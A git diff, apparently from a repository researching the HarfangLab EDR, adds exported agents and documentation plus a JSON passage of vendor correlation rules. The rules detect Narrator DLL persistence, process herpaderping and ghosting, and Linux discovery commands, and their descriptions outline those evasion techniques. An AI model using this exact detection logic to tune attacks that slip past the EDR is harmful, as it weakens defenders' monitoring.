diff --git a/README.md b/README.md
index 301c492..41298de 100644
--- a/README.md
+++ b/README.md
@@ -1,3 +1,9 @@
# harfanglab-research
-Research about the EDR HarfangLab.
\ No newline at end of file
+Research about the EDR HarfangLab.
+
+- All edr agent
+- One linux compiled x64 agent for reverse
+- Sigma, Yara, Correlation_rules, driverBlocklist export
+- Documentation export
+- API Swagger
diff --git a/agents.zip b/agents.zip
new file mode 100644
index 0000000..2ab19e9
Binary files /dev/null and b/agents.zip differ
diff --git a/documentation.zip b/documentation.zip
new file mode 100644
index 0000000..42bad6f
Binary files /dev/null and b/documentation.zip differ
diff --git a/harfang_export/correlation_rule_export.json b/harfang_export/correlation_rule_export.json
new file mode 100644
index 0000000..8b0ee5c
--- /dev/null
+++ b/harfang_export/correlation_rule_export.json
@@ -0,0 +1,834 @@
+{
+ "id": "5d144118-7d20-43ae-99b2-4183693b60c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "35076c6c-23b0-4be8-bcaa-609d1ffabbd1",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Narrator Enabled at Startup",
+ "creation_date": "2025-11-05",
+ "modified_date": "2025-11-05",
+ "description": "Detects the narrator being enabled in registry.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "eea1e78d-a331-437f-930b-3f21dadabd32",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "msttsloc DLL Created",
+ "creation_date": "2025-11-05",
+ "modified_date": "2025-11-05",
+ "description": "Detects `msttslocenus.dll` or `msttsloc_onecoreenus.dll` being written on disk.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "medium",
+ "raw_tags": [],
+ "rule_confidence": "moderate",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [],
+ "inner_rule_counts": {
+ "sigma": 2,
+ "correlation": 0
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.713402Z",
+ "creation_date": "2026-03-23T11:45:27.713405Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.713412Z",
+ "silent": false,
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_narator_dll_planting.yml",
+ "content": "title: msttsloc DLL Created\nname: dll_create_rename\nid: eea1e78d-a331-437f-930b-3f21dadabd32\ndescription: |\n Detects `msttslocenus.dll` or `msttsloc_onecoreenus.dll` being written on disk.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\ndate: 2025/11/05\nmodified: 2025/11/05\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_create:\n Path:\n - '?:\\windows\\system32\\speech\\engine\\tts\\msttslocenus.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n Kind: 'create'\n\n selection_rename:\n TargetPath:\n - '?:\\windows\\system32\\speech\\engine\\tts\\msttslocenus.dll'\n - '?:\\windows\\system32\\speech_onecore\\engines\\tts\\msttsloc_onecoreenus.dll'\n Kind: 'rename'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: moderate\ngenerate: false\n---\ntitle: Narrator Enabled at Startup\nname: autostart_enabled\nid: 35076c6c-23b0-4be8-bcaa-609d1ffabbd1\ndescription: |\n Detects the narrator being enabled in registry.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\ndate: 2025/11/05\nmodified: 2025/11/05\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Accessibility\\Configuration'\n Details|contains: 'Narrator'\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Persistence Installed via Windows Narrator\nid: 5d144118-7d20-43ae-99b2-4183693b60c6\ndescription: |\n Detects the installation of a persistence by abusing the Windows built-in Narrator accessibility feature by planting a non-default DLL and enabling it through registry configuration.\n Narrator automatically loads these DLLs at startup, allowing attackers to execute arbitrary code without user interaction.\n It is recommended to analyze the written library for malicious content and the behavior of processes to identify any suspicious activity.\nreferences:\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2025/11/05\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\ncorrelation:\n type: combination\n platform: windows\n rules:\n - dll_create_rename\n - autostart_enabled\n timespan: 30s\n condition: dll_create_rename and autostart_enabled\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "5d144118-7d20-43ae-99b2-4183693b60c6",
+ "rule_name": "Persistence Installed via Windows Narrator",
+ "rule_description": "Detects the installation of a persistence by abusing the Windows built-in Narrator accessibility feature by planting a non-default DLL and enabling it through registry configuration.\nNarrator automatically loads these DLLs at startup, allowing attackers to execute arbitrary code without user interaction.\nIt is recommended to analyze the written library for malicious content and the behavior of processes to identify any suspicious activity.\n",
+ "rule_creation_date": "2025-11-05",
+ "rule_modified_date": "2026-01-23",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
+{
+ "id": "c757bf7f-5276-4be4-b423-b66cc574df33",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "84fc14aa-6be1-4613-bba7-cd4a029e0ac1",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Executable File Written to Disk",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects when an executable file is being written to disk.\nAdversaries may write executable files to disk as part of process herpaderping techniques.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "fa11676c-07f7-42e3-a01e-3880978e7d05",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Process Created via Legacy NT API",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\nAdversaries may use low-level NT APIs to create processes, potentially evading security controls and traditional process monitoring.\nThis technique is commonly used in process herpaderping attacks.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [],
+ "inner_rule_counts": {
+ "sigma": 2,
+ "correlation": 0
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.714319Z",
+ "creation_date": "2026-03-23T11:45:27.714321Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.714325Z",
+ "silent": false,
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1055/",
+ "https://jxy-s.github.io/herpaderping/"
+ ],
+ "name": "t1055_process_herpaderping.yml",
+ "content": "title: Executable File Written to Disk\nname: written_executable\nid: 84fc14aa-6be1-4613-bba7-cd4a029e0ac1\ndescription: |\n Detects when an executable file is being written to disk.\n Adversaries may write executable files to disk as part of process herpaderping techniques.\nreferences:\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'written_executable'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Created via Legacy NT API\nname: zwcreatethreadex\nid: fa11676c-07f7-42e3-a01e-3880978e7d05\ndescription: |\n Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\n Adversaries may use low-level NT APIs to create processes, potentially evading security controls and traditional process monitoring.\n This technique is commonly used in process herpaderping attacks.\nreferences:\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|contains: 'ZwCreateThreadEx'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Herpaderping Technique Detected\nid: c757bf7f-5276-4be4-b423-b66cc574df33\ndescription: |\n Detects the process herpaderping technique through correlation of executable file writing and legacy process creation events.\n Process herpaderping is an advanced evasion technique where adversaries write a malicious executable to disk, create a process using legacy NT APIs, and then potentially modify the file on disk after it's mapped into memory.\n The technique involves writing executable files to disk and creating processes with legacy NT APIs like ZwCreateThreadEx to evade traditional security controls.\n This allows the process to run with different content than what is actually stored on disk, making detection and analysis more difficult.\n This correlation rule identifies the sequence of operations characteristic of process herpaderping attacks.\n It is recommended to analyze both the process responsible for the herpaderping operation and the created process for malicious content and activities.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\n - https://jxy-s.github.io/herpaderping/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.012\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\ncorrelation:\n type: combination\n platform: windows\n rules:\n - written_executable\n - zwcreatethreadex\n group-by:\n - processes\n processes:\n InjectorProcess:\n written_executable: initiator\n zwcreatethreadex: created.parent\n related-process: InjectorProcess\n timespan: 2s\n condition: zwcreatethreadex and written_executable\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "c757bf7f-5276-4be4-b423-b66cc574df33",
+ "rule_name": "Process Herpaderping Technique Detected",
+ "rule_description": "Detects the process herpaderping technique through correlation of executable file writing and legacy process creation events.\nProcess herpaderping is an advanced evasion technique where adversaries write a malicious executable to disk, create a process using legacy NT APIs, and then potentially modify the file on disk after it's mapped into memory.\nThe technique involves writing executable files to disk and creating processes with legacy NT APIs like ZwCreateThreadEx to evade traditional security controls.\nThis allows the process to run with different content than what is actually stored on disk, making detection and analysis more difficult.\nThis correlation rule identifies the sequence of operations characteristic of process herpaderping attacks.\nIt is recommended to analyze both the process responsible for the herpaderping operation and the created process for malicious content and activities.\n",
+ "rule_creation_date": "2026-03-17",
+ "rule_modified_date": "2026-03-17",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1055",
+ "attack.t1055.012"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
+{
+ "id": "c885cbdc-4171-4e47-8a8e-ab75e8ef2393",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "63b8bd32-635b-4502-9608-767c742d73da",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Process Created via Legacy NT API",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\nAdversaries may exploit the low level NtCreateProcessEx API, which allows them to supply a section object directly (instead of using the newer NtCreateUserProcess API). \nThis capability enables them to manipulate the temporary file that is mapped to that section.\nThis technique is commonly used in process ghosting attacks.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "abd72622-1ac0-4b98-bf2d-99ae74a46dc9",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "File Created",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects the creation of a file that may be used in process ghosting attacks.\nAdversaries may create temporary executable files as part of process ghosting techniques.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ },
+ {
+ "id": "f3dbc60e-b65f-41d6-bdf0-dbff684ef2ce",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "File Removed via NtSetInformationFile",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects the removal of a file through the use of the NtSetInformationFile API.\nAdversaries may remove files to cover their tracks after process ghosting operations.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "windows",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [
+ {
+ "id": "c805dbdc-4197-4e47-8a8e-ab73f7dc1795",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "File Created then Removed via NtSetInformationFile",
+ "creation_date": "2026-03-17",
+ "modified_date": "2026-03-17",
+ "description": "Detects the sequential creation and removal of a file using the NtSetInformationFile API.\nThis pattern is commonly observed in process ghosting techniques where adversaries create temporary files and then remove them to avoid detection.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null
+ }
+ ],
+ "inner_rule_counts": {
+ "sigma": 3,
+ "correlation": 1
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.714282Z",
+ "creation_date": "2026-03-23T11:45:27.714290Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.714295Z",
+ "silent": false,
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack",
+ "https://attack.mitre.org/techniques/T1055/"
+ ],
+ "name": "t1055_process_ghosting.yml",
+ "content": "title: File Created\nname: filecreation\nid: abd72622-1ac0-4b98-bf2d-99ae74a46dc9\ndescription: |\n Detects the creation of a file that may be used in process ghosting attacks.\n Adversaries may create temporary executable files as part of process ghosting techniques.\nreferences: []\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'create'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: File Removed via NtSetInformationFile\nname: fileremoval\nid: f3dbc60e-b65f-41d6-bdf0-dbff684ef2ce\ndescription: |\n Detects the removal of a file through the use of the NtSetInformationFile API.\n Adversaries may remove files to cover their tracks after process ghosting operations.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n Kind: 'remove'\n StackTrace|contains: 'ZwSetInformationFile'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: File Created then Removed via NtSetInformationFile\nname: create_then_remove\nid: c805dbdc-4197-4e47-8a8e-ab73f7dc1795\ndescription: |\n Detects the sequential creation and removal of a file using the NtSetInformationFile API.\n This pattern is commonly observed in process ghosting techniques where adversaries create temporary files and then remove them to avoid detection.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\ncorrelation:\n type: combination\n platform: windows\n rules:\n - filecreation\n - fileremoval\n group-by:\n - processes\n - Path\n processes:\n InjectorProcess: initiator\n related-process: InjectorProcess\n timespan: 2s\n condition: filecreation then fileremoval\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Created via Legacy NT API\nname: zwcreatethreadex\nid: 63b8bd32-635b-4502-9608-767c742d73da\ndescription: |\n Detects the creation of a process using legacy NT APIs such as ZwCreateThreadEx.\n Adversaries may exploit the low level NtCreateProcessEx API, which allows them to supply a section object directly (instead of using the newer NtCreateUserProcess API). \n This capability enables them to manipulate the temporary file that is mapped to that section.\n This technique is commonly used in process ghosting attacks.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\n - https://attack.mitre.org/techniques/T1055/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags: []\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n StackTrace|contains: 'ZwCreateThreadEx'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Process Ghosting Technique Detected\nid: c885cbdc-4171-4e47-8a8e-ab75e8ef2393\ndescription: |\n Detects the process ghosting technique through correlation of file manipulation and legacy process creation events.\n Process ghosting is an advanced evasion technique where adversaries create a file, map it into memory, mark it for deletion, create a process from the mapped memory, and then remove the file.\n The technique involves creating and removing files using NT APIs and creating processes with legacy NT APIs like ZwCreateThreadEx.\n This allows the process to run without having a corresponding file on disk, making detection and analysis more difficult.\n This correlation rule identifies the sequence of operations characteristic of process ghosting attacks.\n It is recommended to analyze both the process responsible for the ghosting operation and the ghosted process for malicious content and activities.\nreferences:\n - https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack\n - https://attack.mitre.org/techniques/T1055/\ndate: 2026/03/17\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.012\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\ncorrelation:\n type: combination\n platform: windows\n rules:\n - zwcreatethreadex\n - create_then_remove\n group-by:\n - processes\n processes:\n InjectorProcess:\n create_then_remove: InjectorProcess\n zwcreatethreadex: created.parent\n related-process: InjectorProcess\n timespan: 2s\n condition: create_then_remove then zwcreatethreadex\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "c885cbdc-4171-4e47-8a8e-ab75e8ef2393",
+ "rule_name": "Process Ghosting Technique Detected",
+ "rule_description": "Detects the process ghosting technique through correlation of file manipulation and legacy process creation events.\nProcess ghosting is an advanced evasion technique where adversaries create a file, map it into memory, mark it for deletion, create a process from the mapped memory, and then remove the file.\nThe technique involves creating and removing files using NT APIs and creating processes with legacy NT APIs like ZwCreateThreadEx.\nThis allows the process to run without having a corresponding file on disk, making detection and analysis more difficult.\nThis correlation rule identifies the sequence of operations characteristic of process ghosting attacks.\nIt is recommended to analyze both the process responsible for the ghosting operation and the ghosted process for malicious content and activities.\n",
+ "rule_creation_date": "2026-03-17",
+ "rule_modified_date": "2026-03-17",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1055",
+ "attack.t1055.012"
+ ],
+ "synchronization_status": "e1942801-4a51-49fb-aa1e-bf854677f6c7",
+ "declared_in": null,
+ "source": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9"
+}
+{
+ "id": "e595008e-d87c-4a1b-a72c-3f9c72d68aca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "bd7155f6-c7cf-4461-8e31-1aa60bf0a7c9",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_dependencies": [],
+ "rule_is_depended_on": [],
+ "inner_sigma": [
+ {
+ "id": "7072ca36-890c-4c57-977e-c4d4f6ee9fd5",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Netstat Executed",
+ "creation_date": "2025-10-20",
+ "modified_date": "2026-01-21",
+ "description": "Detects the execution of the 'netstat' or 'ss' command on a Linux system, which is commonly used to display network connections, routing tables, and network interface statistics.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "linux",
+ "can_block": true
+ },
+ {
+ "id": "ba4e984f-a924-436e-ac4d-0022fa899737",
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "name": "Who Executed",
+ "creation_date": "2025-10-20",
+ "modified_date": "2026-01-21",
+ "description": "Detects the execution of the 'who -a' command on a Linux system, which provides detailed information about all logged-in users, their login times, and system status.\n",
+ "hl_silent": false,
+ "hl_status": null,
+ "level": "low",
+ "raw_tags": [],
+ "rule_confidence": "weak",
+ "status": null,
+ "os": "linux",
+ "can_block": true
+ }
+ ],
+ "inner_correlation": [],
+ "inner_rule_counts": {
+ "sigma": 2,
+ "correlation": 0
+ },
+ "rule_type": "correlation",
+ "is_valid": true,
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:27.713529Z",
+ "creation_date": "2026-03-23T11:45:27.713532Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:27.713540Z",
+ "silent": false,
+ "rule_level": "medium",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery",
+ "https://attack.mitre.org/techniques/T1049/",
+ "https://attack.mitre.org/software/S0104/"
+ ],
+ "name": "t1049_system_network_connections_discovered_linux.yml",
+ "content": "title: Netstat Executed\nname: cmd_netstat\nid: 7072ca36-890c-4c57-977e-c4d4f6ee9fd5\ndescription: |\n Detects the execution of the 'netstat' or 'ss' command on a Linux system, which is commonly used to display network connections, routing tables, and network interface statistics.\nreferences:\n - https://man7.org/linux/man-pages/man8/netstat.8.html\n - https://man7.org/linux/man-pages/man8/ss.8.html\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine:\n - 'netstat'\n - 'ss'\n\n exclusion_bladelogic:\n ProcessGrandparentImage:\n - '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n - '/opt/bladelogic/*/NSH/bin/rscd_full'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: Who Executed\nname: cmd_who\nid: ba4e984f-a924-436e-ac4d-0022fa899737\ndescription: |\n Detects the execution of the 'who -a' command on a Linux system, which provides detailed information about all logged-in users, their login times, and system status.\nreferences:\n - https://man7.org/linux/man-pages/man1/who.1.html\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags: []\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'who -a'\n\n condition: selection\nlevel: low\nconfidence: weak\ngenerate: false\n---\ntitle: System Network Connections Discovered (Linux)\nid: e595008e-d87c-4a1b-a72c-3f9c72d68aca\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/20\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.t1033\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\ncorrelation:\n type: combination\n platform: linux\n rules:\n - cmd_netstat\n - cmd_who\n group-by:\n - processes\n processes:\n MyProcess: created.parent\n related-process: MyProcess\n timespan: 2s\n condition: cmd_netstat and cmd_who\nlevel: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "warnings": null,
+ "errors": null,
+ "rule_id": "e595008e-d87c-4a1b-a72c-3f9c72d68aca",
+ "rule_name": "System Network Connections Discovered (Linux)",
